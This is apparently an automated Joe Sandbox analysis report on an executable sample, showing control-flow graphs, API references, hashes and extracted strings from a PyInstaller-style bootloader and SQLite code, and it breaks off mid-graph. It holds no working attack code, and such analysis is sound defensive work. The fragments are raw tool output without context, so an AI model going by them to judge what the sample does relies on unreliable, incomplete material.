                                                                                                                                                                                                                                                                                                                        control_flow_graph 635 7ff6ba3a1950-7ff6ba3a198b call 7ff6ba3a45c0 638 7ff6ba3a1c4e-7ff6ba3a1c72 call 7ff6ba3ac550 635->638 639 7ff6ba3a1991-7ff6ba3a19d1 call 7ff6ba3a7f90 635->639 644 7ff6ba3a19d7-7ff6ba3a19e7 call 7ff6ba3b06d4 639->644 645 7ff6ba3a1c3b-7ff6ba3a1c3e call 7ff6ba3b004c 639->645 650 7ff6ba3a19e9-7ff6ba3a1a03 call 7ff6ba3b4f08 call 7ff6ba3a2910 644->650 651 7ff6ba3a1a08-7ff6ba3a1a24 call 7ff6ba3b039c 644->651 648 7ff6ba3a1c43-7ff6ba3a1c4b 645->648 648->638 650->645 657 7ff6ba3a1a45-7ff6ba3a1a5a call 7ff6ba3b4f28 651->657 658 7ff6ba3a1a26-7ff6ba3a1a40 call 7ff6ba3b4f08 call 7ff6ba3a2910 651->658 665 7ff6ba3a1a7b-7ff6ba3a1afc call 7ff6ba3a1c80 * 2 call 7ff6ba3b06d4 657->665 666 7ff6ba3a1a5c-7ff6ba3a1a76 call 7ff6ba3b4f08 call 7ff6ba3a2910 657->666 658->645 677 7ff6ba3a1b01-7ff6ba3a1b14 call 7ff6ba3b4f44 665->677 666->645 680 7ff6ba3a1b35-7ff6ba3a1b4e call 7ff6ba3b039c 677->680 681 7ff6ba3a1b16-7ff6ba3a1b30 call 7ff6ba3b4f08 call 7ff6ba3a2910 677->681 687 7ff6ba3a1b6f-7ff6ba3a1b8b call 7ff6ba3b0110 680->687 688 7ff6ba3a1b50-7ff6ba3a1b6a call 7ff6ba3b4f08 call 7ff6ba3a2910 680->688 681->645 695 7ff6ba3a1b9e-7ff6ba3a1bac 687->695 696 7ff6ba3a1b8d-7ff6ba3a1b99 call 7ff6ba3a2710 687->696 688->645 695->645 697 7ff6ba3a1bb2-7ff6ba3a1bb9 695->697 696->645 700 7ff6ba3a1bc1-7ff6ba3a1bc7 697->700 702 7ff6ba3a1be0-7ff6ba3a1bef 700->702 703 7ff6ba3a1bc9-7ff6ba3a1bd6 700->703 702->702 704 7ff6ba3a1bf1-7ff6ba3a1bfa 702->704 703->704 705 7ff6ba3a1c0f 704->705 706 7ff6ba3a1bfc-7ff6ba3a1bff 704->706 708 7ff6ba3a1c11-7ff6ba3a1c24 705->708 706->705 707 7ff6ba3a1c01-7ff6ba3a1c04 706->707 707->705 709 7ff6ba3a1c06-7ff6ba3a1c09 707->709 710 7ff6ba3a1c26 708->710 711 7ff6ba3a1c2d-7ff6ba3a1c39 708->711 709->705 712 7ff6ba3a1c0b-7ff6ba3a1c0d 709->712 710->711 711->645 711->700 712->708
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3A7F90: _fread_nolock.LIBCMT ref: 00007FF6BA3A803A
                                                                                                                                                                                                                                                                                                                        • _fread_nolock.LIBCMT ref: 00007FF6BA3A1A1B
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3A2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6BA3A1B6A), ref: 00007FF6BA3A295E
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                                                                                                        • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                                                                                                        • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 3ff95809ca1090418fbd1d21d944a3955d2264a87fb5bf50133219bb90c93b1a
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 0f13b9b46475006238ca34a1eb1ae64f015f556f94893fcc7f2a56475438f961
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ff95809ca1090418fbd1d21d944a3955d2264a87fb5bf50133219bb90c93b1a
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0A819471A0CA9686EF60DB2CD4402BD63A2EF44784F444576EF8DC7796EE3CE5858740

                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                                                        • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                                                                                        • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 55660f7852eeee30d2d639831c2873b2ebe9c995d45b3204146c46c5ee4e8cf5
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 2dbd0267bc39c503077323a437b2cc46c28bb447a4b7e5bcb654a26f015fb296
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 55660f7852eeee30d2d639831c2873b2ebe9c995d45b3204146c46c5ee4e8cf5
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E3419D32A08AA686EF10DF29E8401B96392FF44784F8445B2EF4DC7B95EE3CE5418704

                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                        control_flow_graph 1044 7ffdfb1443d0-7ffdfb144494 call 7ffdfb1440d0 1047 7ffdfb144846-7ffdfb144849 1044->1047 1048 7ffdfb14449a-7ffdfb1444b8 1044->1048 1051 7ffdfb144853-7ffdfb144856 call 7ffdfb0c6c40 1047->1051 1052 7ffdfb14484b-7ffdfb144851 1047->1052 1049 7ffdfb1444d2-7ffdfb1444d6 1048->1049 1050 7ffdfb1444ba-7ffdfb1444cd 1048->1050 1055 7ffdfb1444d8-7ffdfb1444df 1049->1055 1056 7ffdfb1444e6-7ffdfb1444f2 1049->1056 1057 7ffdfb14486f-7ffdfb14488e call 7ffdfb1f2900 1050->1057 1054 7ffdfb14485b-7ffdfb144861 call 7ffdfb121280 1051->1054 1052->1051 1052->1054 1066 7ffdfb144866-7ffdfb144868 1054->1066 1055->1056 1060 7ffdfb1444e1 call 7ffdfb0dfef0 1055->1060 1061 7ffdfb1444fe-7ffdfb144502 1056->1061 1062 7ffdfb1444f4-7ffdfb1444f8 1056->1062 1060->1056 1063 7ffdfb144504-7ffdfb144508 1061->1063 1064 7ffdfb14450a-7ffdfb14450f call 7ffdfb0e3790 1061->1064 1062->1061 1065 7ffdfb14457b-7ffdfb144586 1062->1065 1063->1064 1070 7ffdfb144578 1063->1070 1073 7ffdfb144514-7ffdfb144518 1064->1073 1071 7ffdfb144590-7ffdfb1445a7 call 7ffdfb0ed660 1065->1071 1066->1057 1070->1065 1076 7ffdfb1445a9-7ffdfb1445b1 1071->1076 1073->1070 1074 7ffdfb14451a-7ffdfb144527 call 7ffdfb182850 1073->1074 1082 7ffdfb14455e-7ffdfb144565 1074->1082 1083 7ffdfb144529 1074->1083 1079 7ffdfb1445be 1076->1079 1080 7ffdfb1445b3-7ffdfb1445bc 1076->1080 1081 7ffdfb1445c1-7ffdfb1445cf 1079->1081 1080->1081 1085 7ffdfb144685 1081->1085 1086 7ffdfb1445d5-7ffdfb1445d8 1081->1086 1087 7ffdfb14456f-7ffdfb144573 1082->1087 1088 7ffdfb144567-7ffdfb14456a call 7ffdfb0c6400 1082->1088 1084 7ffdfb144530-7ffdfb144539 1083->1084 1084->1084 1091 7ffdfb14453b-7ffdfb14454d call 7ffdfb0c6880 1084->1091 1094 7ffdfb14468a-7ffdfb14469d 1085->1094 1092 7ffdfb144615-7ffdfb14461b 1086->1092 1093 7ffdfb1445da-7ffdfb1445df 1086->1093 1090 7ffdfb144829-7ffdfb144831 1087->1090 1088->1087 1097 7ffdfb14483e-7ffdfb144844 1090->1097 1098 7ffdfb144833-7ffdfb144837 1090->1098 1091->1082 1118 7ffdfb14454f-7ffdfb144559 00007FFE13343010 1091->1118 1092->1085 1095 7ffdfb14461d-7ffdfb144630 call 7ffdfb0c6880 1092->1095 1093->1092 1099 7ffdfb1445e1-7ffdfb1445f6 1093->1099 1100 7ffdfb14469f-7ffdfb1446a4 1094->1100 1101 7ffdfb1446d3-7ffdfb1446e6 1094->1101 1126 7ffdfb144632-7ffdfb144663 1095->1126 1127 7ffdfb144666-7ffdfb14466d 1095->1127 1097->1047 1097->1066 1098->1097 1107 7ffdfb144839 call 7ffdfb0dfec0 1098->1107 1109 7ffdfb1445f8-7ffdfb1445fb 1099->1109 1110 7ffdfb14460b-7ffdfb144613 call 7ffdfb12a830 1099->1110 1102 7ffdfb1446b6-7ffdfb1446bd 1100->1102 1103 7ffdfb1446a6-7ffdfb1446ab 1100->1103 1104 7ffdfb1446e8 1101->1104 1105 7ffdfb1446ec-7ffdfb1446f4 1101->1105 1114 7ffdfb1446c0-7ffdfb1446ce call 7ffdfb0e2e50 1102->1114 1111 7ffdfb1446ad-7ffdfb1446b2 1103->1111 1112 7ffdfb1446b4 1103->1112 1104->1105 1116 7ffdfb1446f6-7ffdfb144709 call 7ffdfb0c6880 1105->1116 1117 7ffdfb14473c-7ffdfb14473e 1105->1117 1107->1097 1109->1110 1120 7ffdfb1445fd-7ffdfb1445ff 1109->1120 1110->1094 1111->1114 1112->1102 1114->1101 1138 7ffdfb144722-7ffdfb144729 1116->1138 1139 7ffdfb14470b-7ffdfb14471d 1116->1139 1123 7ffdfb144740-7ffdfb144744 1117->1123 1124 7ffdfb14474b-7ffdfb1447b9 call 7ffdfb0c9170 call 7ffdfb13cf30 1117->1124 1118->1082 1120->1110 1121 7ffdfb144601-7ffdfb144606 1120->1121 1129 7ffdfb14481a-7ffdfb14481e 1121->1129 1123->1124 1130 7ffdfb144746 1123->1130 1146 7ffdfb1447c6-7ffdfb1447c8 1124->1146 1147 7ffdfb1447bb-7ffdfb1447c1 call 7ffdfb0c6400 1124->1147 1126->1127 1133 7ffdfb14466f-7ffdfb144672 call 7ffdfb0c6400 1127->1133 1134 7ffdfb144677-7ffdfb144680 1127->1134 1129->1090 1135 7ffdfb144820-7ffdfb144824 call 7ffdfb0e4b80 1129->1135 1130->1124 1133->1134 1134->1129 1135->1090 1142 7ffdfb144733-7ffdfb144737 1138->1142 1143 7ffdfb14472b-7ffdfb14472e call 7ffdfb0c6400 1138->1143 1139->1138 1142->1129 1143->1142 1149 7ffdfb1447d5-7ffdfb1447d9 1146->1149 1150 7ffdfb1447ca-7ffdfb1447d0 call 7ffdfb11e490 1146->1150 1147->1146 1152 7ffdfb1447f2-7ffdfb1447f4 1149->1152 1153 7ffdfb1447db-7ffdfb1447f0 call 7ffdfb121310 1149->1153 1150->1149 1155 7ffdfb1447f6-7ffdfb1447fe 1152->1155 1156 7ffdfb144805-7ffdfb144815 1152->1156 1153->1129 1155->1129 1158 7ffdfb144800-7ffdfb144803 1155->1158 1156->1129 1158->1129 1158->1156
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: 00007E13343010
                                                                                                                                                                                                                                                                                                                        • String ID: CREATE TABLE x(type text,name text,tbl_name text,rootpage int,sql text)$SELECT*FROM"%w".%s ORDER BY rowid$ase$sqlite_master$sqlite_temp_master$table
                                                                                                                                                                                                                                                                                                                        • API String ID: 2142204133-879093740
                                                                                                                                                                                                                                                                                                                        • Opcode ID: f9f91cf4c879a1f55dcf4b3cc1e56045de927a81096d4cf94589e99b2d0e2aef
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 4b7956135e2544d636c72710755c00eed736ebee825b9fcaaf264eae68240ff6
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f9f91cf4c879a1f55dcf4b3cc1e56045de927a81096d4cf94589e99b2d0e2aef
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7EE1AB63F0A69386FB10CB648460AB927A5FB46B88F154235DE2C177EDDF38E562C340

                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                        control_flow_graph 1159 7ff6ba3a1210-7ff6ba3a126d call 7ff6ba3abd80 1162 7ff6ba3a126f-7ff6ba3a1296 call 7ff6ba3a2710 1159->1162 1163 7ff6ba3a1297-7ff6ba3a12af call 7ff6ba3b4f44 1159->1163 1168 7ff6ba3a12b1-7ff6ba3a12cf call 7ff6ba3b4f08 call 7ff6ba3a2910 1163->1168 1169 7ff6ba3a12d4-7ff6ba3a12e4 call 7ff6ba3b4f44 1163->1169 1182 7ff6ba3a1439-7ff6ba3a146d call 7ff6ba3aba60 call 7ff6ba3b4f30 * 2 1168->1182 1174 7ff6ba3a12e6-7ff6ba3a1304 call 7ff6ba3b4f08 call 7ff6ba3a2910 1169->1174 1175 7ff6ba3a1309-7ff6ba3a131b 1169->1175 1174->1182 1178 7ff6ba3a1320-7ff6ba3a1345 call 7ff6ba3b039c 1175->1178 1188 7ff6ba3a1431 1178->1188 1189 7ff6ba3a134b-7ff6ba3a1355 call 7ff6ba3b0110 1178->1189 1188->1182 1189->1188 1195 7ff6ba3a135b-7ff6ba3a1367 1189->1195 1197 7ff6ba3a1370-7ff6ba3a1398 call 7ff6ba3aa1c0 1195->1197 1200 7ff6ba3a1416-7ff6ba3a142c call 7ff6ba3a2710 1197->1200 1201 7ff6ba3a139a-7ff6ba3a139d 1197->1201 1200->1188 1202 7ff6ba3a139f-7ff6ba3a13a9 1201->1202 1203 7ff6ba3a1411 1201->1203 1205 7ff6ba3a13d4-7ff6ba3a13d7 1202->1205 1206 7ff6ba3a13ab-7ff6ba3a13b9 call 7ff6ba3b0adc 1202->1206 1203->1200 1208 7ff6ba3a13d9-7ff6ba3a13e7 call 7ff6ba3c9e30 1205->1208 1209 7ff6ba3a13ea-7ff6ba3a13ef 1205->1209 1210 7ff6ba3a13be-7ff6ba3a13c1 1206->1210 1208->1209 1209->1197 1212 7ff6ba3a13f5-7ff6ba3a13f8 1209->1212 1213 7ff6ba3a13cf-7ff6ba3a13d2 1210->1213 1214 7ff6ba3a13c3-7ff6ba3a13cd call 7ff6ba3b0110 1210->1214 1216 7ff6ba3a13fa-7ff6ba3a13fd 1212->1216 1217 7ff6ba3a140c-7ff6ba3a140f 1212->1217 1213->1200 1214->1209 1214->1213 1216->1200 1218 7ff6ba3a13ff-7ff6ba3a1407 1216->1218 1217->1188 1218->1178
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                                                        • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                                                                                                        • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 750117d0cef1200f284b8f46e1dc9bb692c8931361e04233996456fa0167cff0
                                                                                                                                                                                                                                                                                                                        • Instruction ID: e7e218bea623bde61708f427b7fcd7b4368cbd96e1b0d49f00024d598f8a602f
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 750117d0cef1200f284b8f46e1dc9bb692c8931361e04233996456fa0167cff0
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5551E322A08A6681EE60AF19E4503BE6292FF85794F844276EF4DC7BD5EF3CE541C700

                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,00007FF6BA3A3804), ref: 00007FF6BA3A36E1
                                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6BA3A3804), ref: 00007FF6BA3A36EB
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3A2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6BA3A3706,?,00007FF6BA3A3804), ref: 00007FF6BA3A2C9E
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3A2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6BA3A3706,?,00007FF6BA3A3804), ref: 00007FF6BA3A2D63
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3A2C50: MessageBoxW.USER32 ref: 00007FF6BA3A2D99
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                                                                                                        • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                                                                                                        • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 4fd1f0c6bb6e1feb03afd2ae079dcc5f2a362c457a86b5d1be680f9e0324aeb2
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 12218161F1866291FE209B28EC513BE6256BF88394F8442B2EF5EC65E5FE2DE505C700

                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                        control_flow_graph 1461 7ff6ba3bba5c-7ff6ba3bba82 1462 7ff6ba3bba84-7ff6ba3bba98 call 7ff6ba3b4ee8 call 7ff6ba3b4f08 1461->1462 1463 7ff6ba3bba9d-7ff6ba3bbaa1 1461->1463 1481 7ff6ba3bbe8e 1462->1481 1464 7ff6ba3bbe77-7ff6ba3bbe83 call 7ff6ba3b4ee8 call 7ff6ba3b4f08 1463->1464 1465 7ff6ba3bbaa7-7ff6ba3bbaae 1463->1465 1484 7ff6ba3bbe89 call 7ff6ba3ba8e0 1464->1484 1465->1464 1467 7ff6ba3bbab4-7ff6ba3bbae2 1465->1467 1467->1464 1470 7ff6ba3bbae8-7ff6ba3bbaef 1467->1470 1473 7ff6ba3bbaf1-7ff6ba3bbb03 call 7ff6ba3b4ee8 call 7ff6ba3b4f08 1470->1473 1474 7ff6ba3bbb08-7ff6ba3bbb0b 1470->1474 1473->1484 1479 7ff6ba3bbb11-7ff6ba3bbb17 1474->1479 1480 7ff6ba3bbe73-7ff6ba3bbe75 1474->1480 1479->1480 1485 7ff6ba3bbb1d-7ff6ba3bbb20 1479->1485 1482 7ff6ba3bbe91-7ff6ba3bbea8 1480->1482 1481->1482 1484->1481 1485->1473 1488 7ff6ba3bbb22-7ff6ba3bbb47 1485->1488 1490 7ff6ba3bbb49-7ff6ba3bbb4b 1488->1490 1491 7ff6ba3bbb7a-7ff6ba3bbb81 1488->1491 1494 7ff6ba3bbb72-7ff6ba3bbb78 1490->1494 1495 7ff6ba3bbb4d-7ff6ba3bbb54 1490->1495 1492 7ff6ba3bbb83-7ff6ba3bbb8f call 7ff6ba3bd5fc 1491->1492 1493 7ff6ba3bbb56-7ff6ba3bbb6d call 7ff6ba3b4ee8 call 7ff6ba3b4f08 call 7ff6ba3ba8e0 1491->1493 1502 7ff6ba3bbb94-7ff6ba3bbbab call 7ff6ba3ba948 * 2 1492->1502 1523 7ff6ba3bbd00 1493->1523 1496 7ff6ba3bbbf8-7ff6ba3bbc0f 1494->1496 1495->1493 1495->1494 1500 7ff6ba3bbc11-7ff6ba3bbc19 1496->1500 1501 7ff6ba3bbc8a-7ff6ba3bbc94 call 7ff6ba3c391c 1496->1501 1500->1501 1505 7ff6ba3bbc1b-7ff6ba3bbc1d 1500->1505 1512 7ff6ba3bbd1e 1501->1512 1513 7ff6ba3bbc9a-7ff6ba3bbcaf 1501->1513 1526 7ff6ba3bbbc8-7ff6ba3bbbf3 call 7ff6ba3bc284 1502->1526 1527 7ff6ba3bbbad-7ff6ba3bbbc3 call 7ff6ba3b4f08 call 7ff6ba3b4ee8 1502->1527 1505->1501 1509 7ff6ba3bbc1f-7ff6ba3bbc35 1505->1509 1509->1501 1514 7ff6ba3bbc37-7ff6ba3bbc43 1509->1514 1516 7ff6ba3bbd23-7ff6ba3bbd43 ReadFile 1512->1516 1513->1512 1518 7ff6ba3bbcb1-7ff6ba3bbcc3 GetConsoleMode 1513->1518 1514->1501 1519 7ff6ba3bbc45-7ff6ba3bbc47 1514->1519 1521 7ff6ba3bbd49-7ff6ba3bbd51 1516->1521 1522 7ff6ba3bbe3d-7ff6ba3bbe46 GetLastError 1516->1522 1518->1512 1524 7ff6ba3bbcc5-7ff6ba3bbccd 1518->1524 1519->1501 1525 7ff6ba3bbc49-7ff6ba3bbc61 1519->1525 1521->1522 1528 7ff6ba3bbd57 1521->1528 1531 7ff6ba3bbe63-7ff6ba3bbe66 1522->1531 1532 7ff6ba3bbe48-7ff6ba3bbe5e call 7ff6ba3b4f08 call 7ff6ba3b4ee8 1522->1532 1533 7ff6ba3bbd03-7ff6ba3bbd0d call 7ff6ba3ba948 1523->1533 1524->1516 1530 7ff6ba3bbccf-7ff6ba3bbcf1 ReadConsoleW 1524->1530 1525->1501 1534 7ff6ba3bbc63-7ff6ba3bbc6f 1525->1534 1526->1496 1527->1523 1537 7ff6ba3bbd5e-7ff6ba3bbd73 1528->1537 1539 7ff6ba3bbcf3 GetLastError 1530->1539 1540 7ff6ba3bbd12-7ff6ba3bbd1c 1530->1540 1544 7ff6ba3bbcf9-7ff6ba3bbcfb call 7ff6ba3b4e7c 1531->1544 1545 7ff6ba3bbe6c-7ff6ba3bbe6e 1531->1545 1532->1523 1533->1482 1534->1501 1543 7ff6ba3bbc71-7ff6ba3bbc73 1534->1543 1537->1533 1547 7ff6ba3bbd75-7ff6ba3bbd80 1537->1547 1539->1544 1540->1537 1543->1501 1551 7ff6ba3bbc75-7ff6ba3bbc85 1543->1551 1544->1523 1545->1533 1553 7ff6ba3bbd82-7ff6ba3bbd9b call 7ff6ba3bb674 1547->1553 1554 7ff6ba3bbda7-7ff6ba3bbdaf 1547->1554 1551->1501 1561 7ff6ba3bbda0-7ff6ba3bbda2 1553->1561 1557 7ff6ba3bbdb1-7ff6ba3bbdc3 1554->1557 1558 7ff6ba3bbe2b-7ff6ba3bbe38 call 7ff6ba3bb4b4 1554->1558 1562 7ff6ba3bbe1e-7ff6ba3bbe26 1557->1562 1563 7ff6ba3bbdc5 1557->1563 1558->1561 1561->1533 1562->1533 1565 7ff6ba3bbdca-7ff6ba3bbdd1 1563->1565 1566 7ff6ba3bbdd3-7ff6ba3bbdd7 1565->1566 1567 7ff6ba3bbe0d-7ff6ba3bbe18 1565->1567 1568 7ff6ba3bbdf3 1566->1568 1569 7ff6ba3bbdd9-7ff6ba3bbde0 